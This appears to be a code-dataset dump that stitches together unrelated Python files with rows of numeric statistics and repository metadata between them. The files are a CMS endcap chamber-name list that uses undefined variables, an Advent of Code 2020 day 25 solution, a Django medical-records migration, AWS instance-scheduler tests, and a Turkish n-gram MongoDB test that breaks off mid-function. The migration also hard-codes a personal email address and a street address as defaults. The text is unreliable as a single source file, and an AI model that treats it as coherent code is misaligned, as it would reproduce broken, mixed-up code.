MEm14 = ["ME-1/4 1", "ME-1/4 2", "ME-1/4 3", "ME-1/4 4", "ME-1/4 5", "ME-1/4 6", "ME-1/4 7", "ME-1/4 8", "ME-1/4 9", "ME-1/4 10", "ME-1/4 11", "ME-1/4 12", "ME-1/4 13", "ME-1/4 14", "ME-1/4 15", "ME-1/4 16", "ME-1/4 17", "ME-1/4 18", "ME-1/4 19", "ME-1/4 20", "ME-1/4 21", "ME-1/4 22", "ME-1/4 23", "ME-1/4 24", "ME-1/4 25", "ME-1/4 26", "ME-1/4 27", "ME-1/4 28", "ME-1/4 29", "ME-1/4 30", "ME-1/4 31", "ME-1/4 32", "ME-1/4 33", "ME-1/4 34", "ME-1/4 35", "ME-1/4 36"]
MEp11 = ["ME+1/1 1", "ME+1/1 2", "ME+1/1 3", "ME+1/1 4", "ME+1/1 5", "ME+1/1 6", "ME+1/1 7", "ME+1/1 8", "ME+1/1 9", "ME+1/1 10", "ME+1/1 11", "ME+1/1 12", "ME+1/1 13", "ME+1/1 14", "ME+1/1 15", "ME+1/1 16", "ME+1/1 17", "ME+1/1 18", "ME+1/1 19", "ME+1/1 20", "ME+1/1 21", "ME+1/1 22", "ME+1/1 23", "ME+1/1 24", "ME+1/1 25", "ME+1/1 26", "ME+1/1 27", "ME+1/1 28", "ME+1/1 29", "ME+1/1 30", "ME+1/1 31", "ME+1/1 32", "ME+1/1 33", "ME+1/1 34", "ME+1/1 35", "ME+1/1 36"]
MEp12 = ["ME+1/2 1", "ME+1/2 2", "ME+1/2 3", "ME+1/2 4", "ME+1/2 5", "ME+1/2 6", "ME+1/2 7", "ME+1/2 8", "ME+1/2 9", "ME+1/2 10", "ME+1/2 11", "ME+1/2 12", "ME+1/2 13", "ME+1/2 14", "ME+1/2 15", "ME+1/2 16", "ME+1/2 17", "ME+1/2 18", "ME+1/2 19", "ME+1/2 20", "ME+1/2 21", "ME+1/2 22", "ME+1/2 23", "ME+1/2 24", "ME+1/2 25", "ME+1/2 26", "ME+1/2 27", "ME+1/2 28", "ME+1/2 29", "ME+1/2 30", "ME+1/2 31", "ME+1/2 32", "ME+1/2 33", "ME+1/2 34", "ME+1/2 35", "ME+1/2 36"]
MEp13 = ["ME+1/3 1", "ME+1/3 2", "ME+1/3 3", "ME+1/3 4", "ME+1/3 5", "ME+1/3 6", "ME+1/3 7", "ME+1/3 8", "ME+1/3 9", "ME+1/3 10", "ME+1/3 11", "ME+1/3 12", "ME+1/3 13", "ME+1/3 14", "ME+1/3 15", "ME+1/3 16", "ME+1/3 17", "ME+1/3 18", "ME+1/3 19", "ME+1/3 20", "ME+1/3 21", "ME+1/3 22", "ME+1/3 23", "ME+1/3 24", "ME+1/3 25", "ME+1/3 26", "ME+1/3 27", "ME+1/3 28", "ME+1/3 29", "ME+1/3 30", "ME+1/3 31", "ME+1/3 32", "ME+1/3 33", "ME+1/3 34", "ME+1/3 35", "ME+1/3 36"]
MEp14 = ["ME+1/4 1", "ME+1/4 2", "ME+1/4 3", "ME+1/4 4", "ME+1/4 5", "ME+1/4 6", "ME+1/4 7", "ME+1/4 8", "ME+1/4 9", "ME+1/4 10", "ME+1/4 11", "ME+1/4 12", "ME+1/4 13", "ME+1/4 14", "ME+1/4 15", "ME+1/4 16", "ME+1/4 17", "ME+1/4 18", "ME+1/4 19", "ME+1/4 20", "ME+1/4 21", "ME+1/4 22", "ME+1/4 23", "ME+1/4 24", "ME+1/4 25", "ME+1/4 26", "ME+1/4 27", "ME+1/4 28", "ME+1/4 29", "ME+1/4 30", "ME+1/4 31", "ME+1/4 32", "ME+1/4 33", "ME+1/4 34", "ME+1/4 35", "ME+1/4 36"]
MEp21 = ["ME+2/1 1", "ME+2/1 2", "ME+2/1 3", "ME+2/1 4", "ME+2/1 5", "ME+2/1 6", "ME+2/1 7", "ME+2/1 8", "ME+2/1 9", "ME+2/1 10", "ME+2/1 11", "ME+2/1 12", "ME+2/1 13", "ME+2/1 14", "ME+2/1 15", "ME+2/1 16", "ME+2/1 17", "ME+2/1 18"]
MEp22 = ["ME+2/2 1", "ME+2/2 2", "ME+2/2 3", "ME+2/2 4", "ME+2/2 5", "ME+2/2 6", "ME+2/2 7", "ME+2/2 8", "ME+2/2 9", "ME+2/2 10", "ME+2/2 11", "ME+2/2 12", "ME+2/2 13", "ME+2/2 14", "ME+2/2 15", "ME+2/2 16", "ME+2/2 17", "ME+2/2 18", "ME+2/2 19", "ME+2/2 20", "ME+2/2 21", "ME+2/2 22", "ME+2/2 23", "ME+2/2 24", "ME+2/2 25", "ME+2/2 26", "ME+2/2 27", "ME+2/2 28", "ME+2/2 29", "ME+2/2 30", "ME+2/2 31", "ME+2/2 32", "ME+2/2 33", "ME+2/2 34", "ME+2/2 35", "ME+2/2 36"]
MEp31 = ["ME+3/1 1", "ME+3/1 2", "ME+3/1 3", "ME+3/1 4", "ME+3/1 5", "ME+3/1 6", "ME+3/1 7", "ME+3/1 8", "ME+3/1 9", "ME+3/1 10", "ME+3/1 11", "ME+3/1 12", "ME+3/1 13", "ME+3/1 14", "ME+3/1 15", "ME+3/1 16", "ME+3/1 17", "ME+3/1 18"]
MEp32 = ["ME+3/2 1", "ME+3/2 2", "ME+3/2 3", "ME+3/2 4", "ME+3/2 5", "ME+3/2 6", "ME+3/2 7", "ME+3/2 8", "ME+3/2 9", "ME+3/2 10", "ME+3/2 11", "ME+3/2 12", "ME+3/2 13", "ME+3/2 14", "ME+3/2 15", "ME+3/2 16", "ME+3/2 17", "ME+3/2 18", "ME+3/2 19", "ME+3/2 20", "ME+3/2 21", "ME+3/2 22", "ME+3/2 23", "ME+3/2 24", "ME+3/2 25", "ME+3/2 26", "ME+3/2 27", "ME+3/2 28", "ME+3/2 29", "ME+3/2 30", "ME+3/2 31", "ME+3/2 32", "ME+3/2 33", "ME+3/2 34", "ME+3/2 35", "ME+3/2 36"]
MEp41 = ["ME+4/1 1", "ME+4/1 2", "ME+4/1 3", "ME+4/1 4", "ME+4/1 5", "ME+4/1 6", "ME+4/1 7", "ME+4/1 8", "ME+4/1 9", "ME+4/1 10", "ME+4/1 11", "ME+4/1 12", "ME+4/1 13", "ME+4/1 14", "ME+4/1 15", "ME+4/1 16", "ME+4/1 17", "ME+4/1 18"]
MEp42 = ["ME+4/2 1", "ME+4/2 2", "ME+4/2 3", "ME+4/2 4", "ME+4/2 5", "ME+4/2 6", "ME+4/2 7", "ME+4/2 8", "ME+4/2 9", "ME+4/2 10", "ME+4/2 11", "ME+4/2 12", "ME+4/2 13", "ME+4/2 14", "ME+4/2 15", "ME+4/2 16", "ME+4/2 17", "ME+4/2 18", "ME+4/2 19", "ME+4/2 20", "ME+4/2 21", "ME+4/2 22", "ME+4/2 23", "ME+4/2 24", "ME+4/2 25", "ME+4/2 26", "ME+4/2 27", "ME+4/2 28", "ME+4/2 29", "ME+4/2 30", "ME+4/2 31", "ME+4/2 32", "ME+4/2 33", "ME+4/2 34", "ME+4/2 35", "ME+4/2 36"]
MEm11all = MEm11 + MEm14
MEp11all = MEp11 + MEp14
ME11 = MEm11 + MEp11
ME12 = MEm12 + MEp12
ME13 = MEm13 + MEp13
ME14 = MEm14 + MEp14
ME11all = ME11 + ME14
ME21 = MEm21 + MEp21
ME22 = MEm22 + MEp22
ME31 = MEm31 + MEp31
ME32 = MEm32 + MEp32
ME41 = MEm41 + MEp41
ME42 = MEm42 + MEp42
endcap = ME11all + ME12 + ME13 + ME21 + ME22 + ME31 + ME32 + ME41 + ME42
| 157.73494 | 467 | 0.490299 | 3,724 | 13,092 | 1.68797 | 0.022288 | 0.137448 | 0.045816 | 0.009068 | 0.777283 | 0.748966 | 0.748966 | 0.748966 | 0.748966 | 0.748966 | 0 | 0.317057 | 0.191262 | 13,092 | 82 | 468 | 159.658537 | 0.276634 | 0 | 0 | 0 | 0 | 0 | 0.580354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
75d38622e9749f327bc65823c09f4f5221554f67 | 2,666 | py | Python | 25.py | mjenrungrot/AdventOfCode2020 | ad2607fe6c4418327a97b863146f7a5af3361afe | [
"MIT"
] | null | null | null | 25.py | mjenrungrot/AdventOfCode2020 | ad2607fe6c4418327a97b863146f7a5af3361afe | [
"MIT"
] | null | null | null | 25.py | mjenrungrot/AdventOfCode2020 | ad2607fe6c4418327a97b863146f7a5af3361afe | [
"MIT"
] | null | null | null | import sys
import copy
import math
def extra():
fp = open("25.input")
SUBJECT_NUMBER = 7
MODULO = 20201227
card_public_key = int(fp.readline().strip())
door_public_key = int(fp.readline().strip())
# print("card public key = {}".format(card_public_key))
# print("door public key = {}".format(door_public_key))
card_loop_size = 0
curr_num = 1
while curr_num != card_public_key:
card_loop_size += 1
curr_num = (curr_num * SUBJECT_NUMBER) % MODULO
# print("card loop size: {}".format(card_loop_size))
door_loop_size = 0
curr_num = 1
while curr_num != door_public_key:
door_loop_size += 1
curr_num = (curr_num * SUBJECT_NUMBER) % MODULO
# print("door loop size: {}".format(door_loop_size))
encryption_key_card_door = 1
for _ in range(card_loop_size):
encryption_key_card_door = (encryption_key_card_door *
door_public_key) % MODULO
encryption_key_door_card = 1
for _ in range(door_loop_size):
encryption_key_door_card = (encryption_key_door_card *
card_public_key) % MODULO
assert encryption_key_card_door == encryption_key_door_card
ans = encryption_key_card_door
print(ans)
def main():
fp = open("25.input")
SUBJECT_NUMBER = 7
MODULO = 20201227
card_public_key = int(fp.readline().strip())
door_public_key = int(fp.readline().strip())
# print("card public key = {}".format(card_public_key))
# print("door public key = {}".format(door_public_key))
card_loop_size = 0
curr_num = 1
while curr_num != card_public_key:
card_loop_size += 1
curr_num = (curr_num * SUBJECT_NUMBER) % MODULO
# print("card loop size: {}".format(card_loop_size))
door_loop_size = 0
curr_num = 1
while curr_num != door_public_key:
door_loop_size += 1
curr_num = (curr_num * SUBJECT_NUMBER) % MODULO
# print("door loop size: {}".format(door_loop_size))
encryption_key_card_door = 1
for _ in range(card_loop_size):
encryption_key_card_door = (encryption_key_card_door *
door_public_key) % MODULO
encryption_key_door_card = 1
for _ in range(door_loop_size):
encryption_key_door_card = (encryption_key_door_card *
card_public_key) % MODULO
assert encryption_key_card_door == encryption_key_door_card
ans = encryption_key_card_door
print(ans)
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == 'extra':
extra()
else:
main()
| 28.666667 | 63 | 0.633908 | 356 | 2,666 | 4.320225 | 0.126404 | 0.117035 | 0.084525 | 0.136541 | 0.937581 | 0.937581 | 0.937581 | 0.937581 | 0.937581 | 0.937581 | 0 | 0.020481 | 0.267442 | 2,666 | 92 | 64 | 28.978261 | 0.767025 | 0.157164 | 0 | 0.83871 | 0 | 0 | 0.012958 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.032258 | false | 0 | 0.048387 | 0 | 0.080645 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f94f5f8b2e0117aa31b0f3e94a451b2d2937dac8 | 11,227 | py | Python | src/django-aurora/aurora/apps/accounts/migrations/0001_initial.py | arantesdv/python-django-project | 01adfd62a0fd47641f151d1bc7e5db2c2ea6d00a | [
"MIT"
] | 1 | 2020-04-22T22:34:26.000Z | 2020-04-22T22:34:26.000Z | src/django-aurora/aurora/apps/accounts/migrations/0001_initial.py | arantesdv/python-django-project | 01adfd62a0fd47641f151d1bc7e5db2c2ea6d00a | [
"MIT"
] | 9 | 2021-03-19T02:17:08.000Z | 2022-03-12T00:25:34.000Z | src/django-aurora/aurora/apps/accounts/migrations/0001_initial.py | arantesdv/python-django-project | 01adfd62a0fd47641f151d1bc7e5db2c2ea6d00a | [
"MIT"
] | null | null | null | # Generated by Django 3.0.5 on 2020-04-25 15:39
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Doctor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creation Date and Time')),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modification Date and Time')),
('meta_keywords', models.CharField(blank=True, help_text='Separate keywords with commas.', max_length=255, verbose_name='Keywords')),
('meta_description', models.CharField(blank=True, max_length=255, verbose_name='Description')),
('meta_observation', models.CharField(blank=True, max_length=255, verbose_name='Observation')),
('self_user', models.BooleanField(default=True, verbose_name='Self user')),
('f_name', models.CharField(max_length=50, verbose_name='First name')),
('l_name', models.CharField(max_length=50, verbose_name='Last name')),
('bdate', models.DateField(default=datetime.date(1978, 9, 7), verbose_name='Birth date')),
('gender', models.CharField(choices=[('O', 'Nenhum/Outro'), ('M', 'Masculino'), ('F', 'Feminino')], default='M', max_length=1, verbose_name='Gender')),
('email', models.EmailField(default='arantesdv@me.com', max_length=254)),
('phone', models.CharField(default='+5562', max_length=20, verbose_name='Phone number')),
('address', models.CharField(default='Rua Rodrigues Tomaz 95 Jundiaí', max_length=200, verbose_name='Address')),
('city', models.CharField(default='Anápolis', max_length=100, verbose_name='City')),
('state', models.CharField(choices=[('DF', 'Distrito Federal'), ('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'), ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'), ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'), ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'), ('SE', 'Sergipe'), ('TO', 'Tocantins')], default='GO', max_length=2, verbose_name='State')),
('slug', models.SlugField(blank=True, default=None, null=True)),
('code', models.CharField(blank=True, default='', max_length=12)),
('is_patient', models.BooleanField(default=False, editable=False, verbose_name='Is patient')),
('is_doctor', models.BooleanField(default=False, editable=False, verbose_name='Is doctor')),
('is_nurse', models.BooleanField(default=False, editable=False, verbose_name='Is nurse')),
('doctor_status', models.BooleanField(default=True, verbose_name='Is active')),
],
options={
'verbose_name': 'Doctor',
'verbose_name_plural': 'Doctors',
},
),
migrations.CreateModel(
name='Patient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creation Date and Time')),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modification Date and Time')),
('meta_keywords', models.CharField(blank=True, help_text='Separate keywords with commas.', max_length=255, verbose_name='Keywords')),
('meta_description', models.CharField(blank=True, max_length=255, verbose_name='Description')),
('meta_observation', models.CharField(blank=True, max_length=255, verbose_name='Observation')),
('self_user', models.BooleanField(default=True, verbose_name='Self user')),
('f_name', models.CharField(max_length=50, verbose_name='First name')),
('l_name', models.CharField(max_length=50, verbose_name='Last name')),
('bdate', models.DateField(default=datetime.date(1978, 9, 7), verbose_name='Birth date')),
('gender', models.CharField(choices=[('O', 'Nenhum/Outro'), ('M', 'Masculino'), ('F', 'Feminino')], default='M', max_length=1, verbose_name='Gender')),
('email', models.EmailField(default='arantesdv@me.com', max_length=254)),
('phone', models.CharField(default='+5562', max_length=20, verbose_name='Phone number')),
('address', models.CharField(default='Rua Rodrigues Tomaz 95 Jundiaí', max_length=200, verbose_name='Address')),
('city', models.CharField(default='Anápolis', max_length=100, verbose_name='City')),
('state', models.CharField(choices=[('DF', 'Distrito Federal'), ('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'), ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'), ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'), ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'), ('SE', 'Sergipe'), ('TO', 'Tocantins')], default='GO', max_length=2, verbose_name='State')),
('slug', models.SlugField(blank=True, default=None, null=True)),
('code', models.CharField(blank=True, default='', max_length=12)),
('is_patient', models.BooleanField(default=False, editable=False, verbose_name='Is patient')),
('is_doctor', models.BooleanField(default=False, editable=False, verbose_name='Is doctor')),
('is_nurse', models.BooleanField(default=False, editable=False, verbose_name='Is nurse')),
('patient_status', models.BooleanField(default=True, verbose_name='Is active')),
('doctors', models.ManyToManyField(blank=True, related_name='patient_doctors', to='accounts.Doctor')),
('family', models.ManyToManyField(blank=True, related_name='patient_family', to='accounts.Patient')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='patient_user', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Patient',
'verbose_name_plural': 'Patients',
},
),
migrations.CreateModel(
name='Nurse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creation Date and Time')),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modification Date and Time')),
('meta_keywords', models.CharField(blank=True, help_text='Separate keywords with commas.', max_length=255, verbose_name='Keywords')),
('meta_description', models.CharField(blank=True, max_length=255, verbose_name='Description')),
('meta_observation', models.CharField(blank=True, max_length=255, verbose_name='Observation')),
('self_user', models.BooleanField(default=True, verbose_name='Self user')),
('f_name', models.CharField(max_length=50, verbose_name='First name')),
('l_name', models.CharField(max_length=50, verbose_name='Last name')),
('bdate', models.DateField(default=datetime.date(1978, 9, 7), verbose_name='Birth date')),
('gender', models.CharField(choices=[('O', 'Nenhum/Outro'), ('M', 'Masculino'), ('F', 'Feminino')], default='M', max_length=1, verbose_name='Gender')),
('email', models.EmailField(default='arantesdv@me.com', max_length=254)),
('phone', models.CharField(default='+5562', max_length=20, verbose_name='Phone number')),
('address', models.CharField(default='Rua Rodrigues Tomaz 95 Jundiaí', max_length=200, verbose_name='Address')),
('city', models.CharField(default='Anápolis', max_length=100, verbose_name='City')),
('state', models.CharField(choices=[('DF', 'Distrito Federal'), ('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'), ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'), ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'), ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'), ('SE', 'Sergipe'), ('TO', 'Tocantins')], default='GO', max_length=2, verbose_name='State')),
('slug', models.SlugField(blank=True, default=None, null=True)),
('code', models.CharField(blank=True, default='', max_length=12)),
('is_patient', models.BooleanField(default=False, editable=False, verbose_name='Is patient')),
('is_doctor', models.BooleanField(default=False, editable=False, verbose_name='Is doctor')),
('is_nurse', models.BooleanField(default=False, editable=False, verbose_name='Is nurse')),
('nurse_status', models.BooleanField(default=True, verbose_name='Is active')),
('patients', models.ManyToManyField(blank=True, related_name='nurse_patients', to='accounts.Patient')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nurse_user', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Nurse',
'verbose_name_plural': 'Nurses',
'abstract': False,
},
),
migrations.AddField(
model_name='doctor',
name='patients',
field=models.ManyToManyField(blank=True, related_name='doctor_patients', to='accounts.Patient'),
),
migrations.AddField(
model_name='doctor',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='doctor_user', to=settings.AUTH_USER_MODEL),
),
migrations.AddConstraint(
model_name='nurse',
constraint=models.UniqueConstraint(fields=('f_name', 'l_name', 'bdate', 'gender'), name='unique_profile'),
),
]
| 85.05303 | 682 | 0.60497 | 1,243 | 11,227 | 5.31778 | 0.167337 | 0.104841 | 0.056732 | 0.04357 | 0.889107 | 0.889107 | 0.861422 | 0.846899 | 0.846899 | 0.808775 | 0 | 0.015148 | 0.206199 | 11,227 | 131 | 683 | 85.70229 | 0.726548 | 0.004008 | 0 | 0.685484 | 1 | 0 | 0.247853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f9a6830a2d405f3caf7544961f793bbb90754150 | 2,361 | py | Python | source/lambda/tests/test_instance_scheduler.py | linuxplayground/aws-instance-scheduler | d9208ddc4528536f20e14127ea0f49f8c52ea811 | [
"Apache-2.0"
] | 33 | 2021-10-30T12:52:12.000Z | 2022-03-30T00:35:33.000Z | source/lambda/tests/test_instance_scheduler.py | linuxplayground/aws-instance-scheduler | d9208ddc4528536f20e14127ea0f49f8c52ea811 | [
"Apache-2.0"
] | 29 | 2021-11-01T14:56:47.000Z | 2022-03-28T17:31:56.000Z | source/lambda/tests/test_instance_scheduler.py | linuxplayground/aws-instance-scheduler | d9208ddc4528536f20e14127ea0f49f8c52ea811 | [
"Apache-2.0"
] | 17 | 2021-10-30T12:52:07.000Z | 2022-03-28T09:53:50.000Z | from unittest import mock
import os
from configuration.instance_schedule import InstanceSchedule
mock.patch.dict(os.environ, {'MAINTENANCE_WINDOW_TABLE': 'test_table'}).start()
from schedulers import Ec2Service
from util.named_tuple_builder import as_namedtuple
from schedulers.instance_scheduler import InstanceScheduler
def test_get_desired_state_and_type_1(mocker):
instance = {}
schedule = InstanceSchedule(
name='test-1',
periods={},
timezone='UTC',
override_status=None,
description=None,
use_metrics=None,
stop_new_instances=None,
schedule_dt=None,
use_maintenance_window=False,
ssm_maintenance_window=True,
enforced=False,
hibernate=False,
retain_running=False
)
instance['maintenance_window'] = schedule
instance["account"] = 'test'
instance["region"] = 'us-east-1'
instance["service"] = 'ec2'
instance["id"] = 'ut12y21232u'
inst = as_namedtuple('ec2' + "Instance", instance, excludes=["tags"])
ec2_service = Ec2Service()
scheduler_configuration = {}
scheduler = InstanceScheduler(ec2_service, scheduler_configuration)
mocker.patch.object(scheduler, '_logger')
inst_state, inst_type = scheduler.get_desired_state_and_type(schedule, inst)
assert inst_state == 'stopped'
def test_get_desired_state_and_type_2(mocker):
instance = {}
schedule = InstanceSchedule(
name='test-1',
periods={},
timezone='UTC',
override_status=None,
description=None,
use_metrics=None,
stop_new_instances=None,
schedule_dt=None,
use_maintenance_window=True,
ssm_maintenance_window=True,
enforced=False,
hibernate=False,
retain_running=False
)
instance['maintenance_window'] = None
instance["account"] = 'test'
instance["region"] = 'us-east-1'
instance["service"] = 'ec2'
instance["id"] = 'ut12y21232u'
inst = as_namedtuple('ec2' + "Instance", instance, excludes=["tags"])
ec2_service = Ec2Service()
scheduler_configuration = {}
scheduler = InstanceScheduler(ec2_service, scheduler_configuration)
mocker.patch.object(scheduler, '_logger')
inst_state, inst_type = scheduler.get_desired_state_and_type(schedule, inst)
assert inst_state == 'stopped' | 33.728571 | 80 | 0.685726 | 253 | 2,361 | 6.130435 | 0.284585 | 0.076725 | 0.038685 | 0.046422 | 0.81109 | 0.81109 | 0.81109 | 0.773694 | 0.773694 | 0.773694 | 0 | 0.016542 | 0.206269 | 2,361 | 70 | 81 | 33.728571 | 0.811099 | 0 | 0 | 0.769231 | 0 | 0 | 0.103302 | 0.010161 | 0 | 0 | 0 | 0 | 0.030769 | 1 | 0.030769 | false | 0 | 0.092308 | 0 | 0.123077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dda6fc771ede239762afc03319085c8a364b299c | 31,083 | py | Python | lib/turkish_nltk/trnltk/ngrams/test/ngramgeneratordbtest.py | myasiny/wordembed | d4df516a4ac6eed71d1cc6e085638e895c525de6 | [
"MIT"
] | null | null | null | lib/turkish_nltk/trnltk/ngrams/test/ngramgeneratordbtest.py | myasiny/wordembed | d4df516a4ac6eed71d1cc6e085638e895c525de6 | [
"MIT"
] | null | null | null | lib/turkish_nltk/trnltk/ngrams/test/ngramgeneratordbtest.py | myasiny/wordembed | d4df516a4ac6eed71d1cc6e085638e895c525de6 | [
"MIT"
] | null | null | null | # coding=utf-8
"""
Copyright 2012 Ali Ok (aliokATapacheDOTorg)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from bson.code import Code
import os
import unittest
from xml.dom.minidom import parse
import pymongo
from trnltk.ngrams.ngramgenerator import WordNGramGenerator, WordUnigramWithParseResultGenerator
from trnltk.parseset.xmlbindings import ParseSetBinding, UnparsableWordBinding
def _count_distinct_ngrams(collection, keys, filter_criteria):
mapper = Code("""
function(){
emit({
""" + keys + """
}, {count: 1});
}
""")
reducer = Code("""
function(key,values){
var total = 0;
for (var i = 0; i < values.length; i++) {
total += values[i].count
}
return {count:total};
}
""")
result = collection.map_reduce(mapper, reducer, "_temporary")
if filter_criteria:
result = result.find(filter_criteria)
return result.count()
class WordUnigramMongodbGeneratorTest(unittest.TestCase):
BULK_INSERT_SIZE = 500
@classmethod
def setUpClass(cls):
super(WordUnigramMongodbGeneratorTest, cls).setUpClass()
connection = pymongo.Connection(host="127.0.0.1")
cls.db = connection['trnltk']
def test_create_unigrams_for_parseset_001(self):
self._create_unigrams_for_parseset_n("001")
def test_create_unigrams_for_parseset_002(self):
self._create_unigrams_for_parseset_n("002")
def test_create_unigrams_for_parseset_003(self):
self._create_unigrams_for_parseset_n("003")
def test_create_unigrams_for_parseset_004(self):
self._create_unigrams_for_parseset_n("004")
def test_create_unigrams_for_parseset_005(self):
self._create_unigrams_for_parseset_n("005")
def test_create_unigrams_for_parseset_999(self):
self._create_unigrams_for_parseset_n("999")
def test_inspect_unigrams_for_parseset_001(self):
self._inspect_unigrams_for_parseset_n("001")
def test_inspect_unigrams_for_parseset_002(self):
self._inspect_unigrams_for_parseset_n("002")
def test_inspect_unigrams_for_parseset_003(self):
self._inspect_unigrams_for_parseset_n("003")
def test_inspect_unigrams_for_parseset_004(self):
self._inspect_unigrams_for_parseset_n("004")
def test_inspect_unigrams_for_parseset_005(self):
self._inspect_unigrams_for_parseset_n("005")
def test_inspect_unigrams_for_parseset_999(self):
self._inspect_unigrams_for_parseset_n("999")
def _create_unigrams_for_parseset_n(self, parseset_index):
print "Parsing parse set {} and generating unigrams with occurrence counts".format(parseset_index)
dom = parse(os.path.join(os.path.dirname(__file__), '../../testresources/parsesets/parseset{}.xml'.format(parseset_index)))
parseset = ParseSetBinding.build(dom.getElementsByTagName("parseset")[0])
print "Found {} sentences".format(len(parseset.sentences))
words = [word for sentence in parseset.sentences for word in sentence.words]
print "Found {} words".format(len(words))
print "Found {} parsable words".format(
len(filter(lambda word: not isinstance(word, UnparsableWordBinding), words)))
generator = WordNGramGenerator(1)
collection = self.db['wordUnigrams{}'.format(parseset_index)]
# delete everything in the collection
collection.remove({})
bulk_insert_buffer = []
for unigram in generator.iter_ngrams(words):
entity = {
'item_0': unigram
}
bulk_insert_buffer.append(entity)
if len(bulk_insert_buffer) % self.BULK_INSERT_SIZE == 0:
collection.insert(bulk_insert_buffer)
bulk_insert_buffer = []
collection.insert(bulk_insert_buffer)
self._inspect_unigrams_for_parseset_n(parseset_index)
def _inspect_unigrams_for_parseset_n(self, parseset_index):
collection = self.db['wordUnigrams{}'.format(parseset_index)]
unigram_count = collection.count()
print "Found {} unigrams".format(unigram_count)
distinct_surface_unigram_count = self._count_distinct_surface_unigrams(collection)
print "Found {} distinct surface unigrams".format(distinct_surface_unigram_count)
distinct_surface_unigram_with_multiple_occurrences_count = self._count_distinct_surface_unigrams_with_multiple_occurrences(collection)
